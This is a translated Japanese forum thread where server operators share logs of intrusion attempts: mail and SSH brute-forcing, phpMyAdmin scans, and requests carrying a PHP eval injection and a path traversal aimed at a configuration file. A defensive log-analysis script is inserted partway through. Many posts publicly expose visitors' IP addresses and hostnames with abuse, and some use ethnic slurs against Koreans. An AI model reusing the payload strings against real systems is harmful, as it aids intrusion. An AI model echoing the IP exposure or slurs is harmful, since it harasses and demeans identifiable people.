dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql
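Of the ones coming from within Japan, many are OCN; is there a reason for that?
Number of users.
Got hit with a DDoS from a mysterious ISP called YokozunaNET.
Mongolia, lol.
These keep trying to break in on port 22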
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp
ssh (dd_ssh) attack
1.33.202.193
el-labo-s1.el-labo.jp
So this thread still exists.
For ssh protection, if you just keep denyhosts running it collects them automatically.
With purge_deny=1y set, it collected this many.
% egrep ^sshd /etc/hosts.deny | wc -l
968
218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-
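>>141 This guy's an idiot.
Saying "this many" without even stating the period.
It's summer, huh.
Should at least look up what
purge_deny=1y means before posting.
I don't think that's what was meant.
It's summer all right; is there nobody here but cranks?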
2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"
It purges after one year, so obviously it's one year's worth of collection... good grief.
148 :
DNS未登録さん:2012/09/18(Tue) 20:47:17.39 ID:Iu7w4W0H
203.91.121.70
It brute-forces ssh on my server more than 10,000 times every day.
Kind of scary.
The attacks on my mail server are crazy today...
>>152 These guys?
Those IPs each hit our mail server several times in quick succession within a short period.
[Partial excerpt]
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<zaragoza>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<boullosa>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<capurro>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<phernandez>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<lucero>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<moreno>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<munoz>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
They were coming at a tremendous rate, changing the username each time.
66.161.176.108 - - [06/Feb/2013:21:06:40 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:10 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /db/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /PMA/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /pma/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /mysql/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /myadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /phpadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /webadmin/main.php HTTP/1.0" 404 1001 "-" "-"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:28 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:30 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:31 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
141.212.121.10 - - [05/Feb/2013:23:42:40 +0900] "\x80w\x01\x03\x01" 501 951 "-" "-"
There's no MyAdmin here, idiot.
pma attacks come all the time, don't they.
We're fine because we put a birthday in the directory name.
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
Searching for softbank126009120142.bbtec.net turns up a ton of hits, so it's probably coming via a stepping-stone host.
161 :
DNS未登録さん:2013/05/31(Fri) 21:16:51.20 ID:EB7lGreO
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
46.249.33.47 - - [31/May/2013:18:21:29 +0900] "GET /epgrec/systemSetting.php HTTP/1.1" 404 1062 "-" "-"
162 :
DNS未登録さん:2013/08/05(Mon) NY:AN:NY.AN ID:94vJNvT+
IP address 118.22.250.219
Hostname p3219-ipngn1202marunouchi.tokyo.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection line Fiber optic
Prefecture Tokyo
Stop hammering F5, you scumbag!!
163 :
DNS未登録さん:2013/08/08(Thu) NY:AN:NY.AN ID:mX0qXlbe
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
164 :
DNS未登録さん:2013/08/16(Fri) NY:AN:NY.AN ID:9nzUfPAp
IP address 219.33.248.7
Hostname softbank219033248007.bbtec.net
Country of IP allocation Japan ( jp )
Area code N/A
Connection line xDSL
Prefecture Aichi
165 :
DNS未登録さん:2013/08/16(Fri) NY:AN:NY.AN ID:9nzUfPAp
softbank219033248007.bbtec.net
/img/ic_p_hand.gif
13/08/167:47
error 403
softbank219033248007.bbtec.net
/img/ic_p_hand.gif
13/08/167:47
error 403
softbank219033248007.bbtec.net
/img/ic_p_hand.gif
13/08/167:47
error 403
softbank219033248007.bbtec.net
/img/ic_p_hand.gif
13/08/167:46
error 403
166 :
DNS未登録さん:2013/08/16(Fri) NY:AN:NY.AN ID:9nzUfPAp
IP address 103.28.96.56
Hostname dhcp38056.orihime.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection line N/A
Prefecture N/A
167 :
DNS Unregistered-san:2013/08/23(Fri) NY:AN:NY.AN ID:nLRBGm+O
IP address 61.46.103.148
Hostname zaq3d2e6794.zaq.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type CATV
Prefecture Osaka
168 :
DNS Unregistered-san:2013/08/26(Mon) NY:AN:NY.AN ID:fpjUopE0
IP address 123.225.228.170
Hostname p3170-ipbf1705sapodori.hokkaido.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
169 :
DNS Unregistered-san:2013/08/26(Mon) NY:AN:NY.AN ID:OJcg0k54
ssh from 27.102.192.140
/var/log/auth.log
Aug 26 06:24:32 ***** sshd[13852]: Invalid user bart from 27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: input_userauth_request: invalid user bart [preauth]
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): check pass; user unknown
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): getting password (0x00000388)
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): pam_get_item returned a password
Aug 26 06:24:34 ***** sshd[13852]: Failed password for invalid user bart from 27.102.192.140 port 33426 ssh2
Aug 26 06:24:34 ***** sshd[13852]: Received disconnect from 27.102.192.140: 11: Bye Bye [preauth]
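The sshd lines in the post above can be turned into a simple detection: one source address trying many different usernames within a short window. This is an added example, not part of the original thread; the sample log is constructed (documentation IP ranges), and the 10-minute window and three-username threshold are assumptions to tune.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the auth.log format quoted in the post (documentation IPs).
SAMPLE = """\
Aug 26 06:24:32 host sshd[13852]: Invalid user bart from 203.0.113.7
Aug 26 06:24:34 host sshd[13852]: Failed password for invalid user bart from 203.0.113.7 port 33426 ssh2
Aug 26 06:24:39 host sshd[13860]: Failed password for invalid user lisa from 203.0.113.7 port 33502 ssh2
Aug 26 06:24:45 host sshd[13871]: Failed password for invalid user homer from ::ffff:203.0.113.7 port 33611 ssh2
Aug 26 06:25:02 host sshd[13880]: Failed password for root from 203.0.113.7 port 33720 ssh2
Aug 26 07:10:11 host sshd[14002]: Failed password for alice from 198.51.100.20 port 50122 ssh2
Aug 26 09:40:57 host sshd[14410]: Failed password for alice from 198.51.100.20 port 50388 ssh2
Aug 26 09:41:30 host sshd[14415]: Accepted password for alice from 198.51.100.20 port 50401 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?:::ffff:)?(?P<ip>\S+) port \d+")

def parse_failures(text, year=2013):
    """Yield (timestamp, ip, user, is_invalid_user) per failed password line."""
    for line in text.splitlines():
        m = FAILED.match(line)
        if m:  # syslog omits the year, so the caller supplies it
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], bool(m["invalid"])

def flag_bruteforce(text, window=timedelta(minutes=10), min_users=3):
    """Return {ip: sorted usernames} for sources that tried at least
    min_users distinct usernames inside one sliding window."""
    by_ip = defaultdict(list)
    for ts, ip, user, _ in parse_failures(text):
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged[ip] = sorted(users)
                break
    return flagged

if __name__ == "__main__":
    print(flag_bruteforce(SAMPLE))
```

The IPv4-mapped `::ffff:` prefix is stripped so that the same source is counted once, and a legitimate user who mistypes a password twice (the second address in the sample) is not flagged.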
170 :
DNS Unregistered-san:2013/08/29(Thu) NY:AN:NY.AN ID:tF8Whh+x
IP address 111.108.19.55
Hostname kd111108019055.ppp-bb.dion.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Tochigi
171 :
DNS Unregistered-san:2013/08/30(Fri) NY:AN:NY.AN ID:6dzYV3Q5
IP address 223.25.160.33
Hostname g1-223-25-160-33.bmobile.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type N/A
Prefecture N/A
172 :
DNS Unregistered-san:2013/08/31(Sat) NY:AN:NY.AN ID:tNHoGxV9
IP address 106.177.13.31
Hostname kd106177013031.ppp-bb.dion.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Unknown
Prefecture N/A
173 :
DNS Unregistered-san:2013/09/02(Mon) 16:28:44.06 ID:TxMBkHkr
IP address 118.21.111.71
Hostname i118-21-111-71.s30.a048.ap.plala.or.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture N/A
KD106177151101.ppp-bb.dion.ne.jp
IP address 125.1.164.67
Hostname nttkyo455067.tkyo.nt.ngn2.ppp.infoweb.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Tokyo
176 :
DNS Unregistered-san:2013/09/18(Wed) 18:52:43.64 ID:LV75/hp7
IP address 153.160.118.147
Hostname p7147-ipngn4701marunouchi.tokyo.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Tokyo
F5-hammering lunatic
177 :
DNS Unregistered-san:2013/09/26(Thu) 10:43:46.87 ID:H3fwxe36
IP address 220.2.96.8
Hostname softbank220002096008.bbtec.net
Country of IP allocation Japan ( jp )
Area code N/A
Connection type xDSL
Prefecture Shizuoka
Give it a rest, you scumbag!!
Don't ever come back!!
178 :
DNS Unregistered-san:2013/09/28(Sat) 12:03:51.71 ID:VCik+XYP
IP address 106.159.106.72
Hostname KD106159106072.ppp-bb.dion.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Unknown
Prefecture Hokkaido
179 :
DNS Unregistered-san:2013/09/29(Sun) 19:52:16.89 ID:1SD9W5dU
IP address 58.183.196.116
Hostname 116.196.183.58.megaegg.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hiroshima
The F5 hammering is so annoying
180 :
DNS Unregistered-san:2013/10/03(Thu) 22:55:20.49 ID:VT6xWLU1
IP address 61.193.122.189
Hostname flh1adk189.hkd.mesh.ad.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
181 :
DNS Unregistered-san:2013/10/26(Sat) 17:45:20.67 ID:7I33GS7j BE:287314447-PLT(27717)
IP address 121.84.32.120
Hostname 121-84-32-120f1.hyg2.eonet.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hyogo
Get lost, you piece of trash!!
You're in the way!!
182 :
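DNS Unregistered-san:2013/10/27(Sun) 22:37:50.15 ID:bwjv7tIF
IP address 114.167.56.193
Hostname p1193-ipbf2406sapodori.hokkaido.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
Get lost, you piece of trash!!
You're in the way!!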
183 :
DNS Unregistered-san:2013/11/08(Fri) 23:37:18.06 ID:+w98rXs3
IP address 114.20.150.51
Hostname KD114020150051.ppp.prin.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type PHS
Prefecture N/A
Blog-vandalizing Korean scum
184 :
DNS Unregistered-san:2013/11/08(Fri) 23:43:48.40 ID:+w98rXs3
Koreans throwing a fit are so annoying
185 :
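DNS Unregistered-san:2013/11/09(Sat) 08:14:46.27 ID:eIre5eR+
Remote host i121-117-132-189.s41.a030.ap.plala.or.jp
IP address 121.117.132.189
Quit hitting my site with stupid query strings, you trash!!
IP address 112.216.76.110
Friday, 2013-11-08: 5972 unauthorized access attempts against my SMTP server in just under an hour
100 times a minute? Didn't they just screw something up? lol
Screw up what?
They were randomly changing the username and pass, so it's got to be a brute-force script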
189 :
DNS Unregistered-san:2013/11/10(Sun) 19:39:49.84 ID:cVHzLtoH
IP address 113.147.246.150
Hostname KD113147246150.ppp-bb.dion.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
Stay away, you piece of trash!!
190 :
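DNS Unregistered-san:2013/11/10(Sun) 20:43:43.12 ID:cVHzLtoH
Again today, on a certain blog that bashes Koreans,
a Korean on the WILLCOM provider is going berserk.
I think it's about time I reported them.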
191 :
DNS Unregistered-san:2013/11/10(Sun) 20:54:43.23 ID:cVHzLtoH
2013-11-10 20:35:19
Article Tomo's Blog
Browser Mozilla/3.0(WILLCOM;KYOCERA/WX01K/2;2.0.3.14.000000/1/C256) NetFront/3.4
Remote host 114.20.150.165 (KD114020150165.ppp.prin.ne.jp)
I'm exposing the IP.
IP address 114.20.150.165
Hostname KD114020150165.ppp.prin.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type PHS
Prefecture N/A
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 114.20.128.0/17
b. [ネットワーク名] DP-PACKET2
f. [組織名] 株式会社ウィルコム
g. [Organization] WILLCOM, Inc.
192 :
DNS Unregistered-san:2013/11/11(Mon) 00:27:08.99 ID:lmKWIlMp
Hey you, quit snooping around!!
2013-11-10 22:45:35
Article Tomo's Blog
Browser Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Remote host 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)
2013-11-10 22:48:23
Article Tomo's Blog
Referrer my other site
Browser Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Remote host 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)
2013-11-10 22:48:39
Article I've started a blog!
Browser Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Remote host 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)
2013-11-10 22:49:26
Article Tomo's Blog
Referrer http://blog.livedoor.jp/oboega/lite/archives/34528159/comments/7759059/?p=19
Browser Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Remote host 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)
193 :
DNS Unregistered-san:2013/11/11(Mon) 00:28:43.93 ID:lmKWIlMp
Who's unpopular? My blog has a PageRank of 4.
Don't underestimate me!!
194 :
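DNS Unregistered-san:2013/11/11(Mon) 00:30:40.07 ID:lmKWIlMp
Maybe it's about time I banned that Korean guy.
>>188 If all you write is "SMTP", people will assume it's mail-relay retries
Isn't it the submission port?
Not that I know.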
197 :
DNS Unregistered-san:2013/11/20(Wed) 15:11:20.22 ID:4DZV18u4
IP address 162.210.196.165
Hostname No corresponding hostname.
Country of IP allocation United States ( us )
Area code N/A
Connection type N/A
Prefecture N/A
You're in the way, blockhead
198 :
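DNS Unregistered-san:2013/11/21(Thu) 15:00:19.78 ID:omIbxvki
IP address 122.18.75.228
Hostname p1228-ipbf802sapodori.hokkaido.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
You're in the way, blockhead
Is this the googlebot that keeps showing up in netstat, I wonder?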
TCP <hostname>:2035 nrt04s05-in-f3.1e100.net:http TIME_WAIT
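It shows up so often it's creepy
My machine is just a client environment and I'm not exposing anything externally, though
When I access Google with JavaScript turned off,
I almost always get visits from this domain for a while afterwards
Turn off Firefox's malicious-site blocking.
These attacks are seriously annoying
IP address 182.250.240.2
Hostname KD182250240002.au-net.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Unknown
Prefecture N/A
Give it a rest, you scumbag!!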
203 :
DNS Unregistered-san:2013/12/15(Sun) 19:47:37.13 ID:??? BE:153918353-PLT(27717)
IP address 115.65.5.170
Hostname g170.115-65-5.ppp.wakwak.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Aomori
Give it a rest, you scumbag!!
204 :
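DNS Unregistered-san:2013/12/15(Sun) 19:53:06.43 ID:??? BE:82090324-PLT(27717)
IP address 123.224.187.59
Hostname p2059-ipbf4102marunouchi.tokyo.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Tokyo
You too
Out of the way
IP address 119.105.170.249
Hostname KD119105170249.ppp-bb.dion.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Tokyo
You're in the way, garbage!!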
206 :
DNS Unregistered-san:2013/12/19(Thu) 21:53:35.50 ID:??? BE:246269838-PLT(27717)
IP address 122.16.37.149
Hostname p2149-ipbf1001sapodori.hokkaido.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
207 :
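DNS Unregistered-san:2013/12/19(Thu) 22:15:48.10 ID:??? BE:359142375-PLT(27717)
IP address 126.209.132.45
Hostname pw126209132045.4.kyb.panda-world.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Mobile phone
Prefecture N/A
IP address 220.247.10.107
Hostname static-220-247-10-107.b-man.svips.gol.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture N/A
Give it a rest, you scumbag!!
Not exactly an attack, but
the crawler from Baidu, the data-harvesting service everyone's talking about right now, is the worst, so
I'm blocking every IP range allocated to Baidu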
210 :
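DNS Unregistered-san:2013/12/28(Sat) 00:53:14.16 ID:??? BE:184702436-PLT(27717)
IP address 124.84.37.47
Hostname p4047-ipbf504sapodori.hokkaido.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
Drop dead, you piece of garbage!!
IP address 219.104.230.145
Hostname hmmt105145.catv.ppp.infoweb.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type CATV
Prefecture Shizuoka
You're in the way, trash!!
IP address 123.198.39.72
Hostname p7bc62748.szoknt01.ap.so-net.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Unknown
Prefecture Shizuoka
You're in the way, trash!!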
213 :
DNS Unregistered-san:2014/01/09(Thu) 22:53:48.84 ID:??? BE:215485373-PLT(27717)
IP address 223.218.116.37
Hostname i223-218-116-37.s41.a002.ap.plala.or.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Yamagata
Give it a rest, you scumbag!!
214 :
DNS Unregistered-san:2014/01/09(Thu) 22:59:07.04 ID:??? BE:256530555-PLT(27717)
IP address 61.27.82.154
Hostname 61-27-82-154.rev.home.ne.jp
Country of IP allocation Japan ( jp )
Area code 011
Connection type CATV
Prefecture Hokkaido
You too!!
215 :
DNS Unregistered-san:2014/01/12(Sun) 22:10:50.36 ID:??? BE:123134562-PLT(27717)
IP address 126.121.2.38
Hostname softbank126121002038.bbtec.net
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
User ID # Person of concern 2415 [the type who comes from a defamation site and digs around]
Hostname # i114-180-180-98.s04.a001.ap.plala.or.jp
IP address # 114.180.180.98
Quit snooping, trash!!
IP address 114.176.228.202
Hostname p25202-ipngn100401fukuokachu.fukuoka.ocn.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Fukuoka
a. [IPネットワークアドレス] 59.86.64.0/18
b. [ネットワーク名] TOKAI-NET
f. [組織名] 株式会社TOKAIコミュニケーションズ
g. [Organization] TOKAI Communications Corporation
m. [管理者連絡窓口] JP00078308
n. [技術連絡担当者] JP00078308
IP address 113.159.230.90
Hostname KD113159230090.ppp-bb.dion.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture Hokkaido
This one again
Give it a rest, you scumbag!!
220 :
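DNS Unregistered-san:2014/02/01(Sat) 00:45:41.44 ID:??? BE:410448858-PLT(27717)
IP address 113.38.179.234
Hostname 113x38x179x234.ap113.ftth.ucom.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection type Fiber
Prefecture N/A
Post while half asleep and you'll embarrass yourself
It was a mispost, but the thread was moving for the first time in a while, so
IP: 192.151.148.234
Host: could not be resolved
Attempts trackback spam several hundred times a day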
224 :
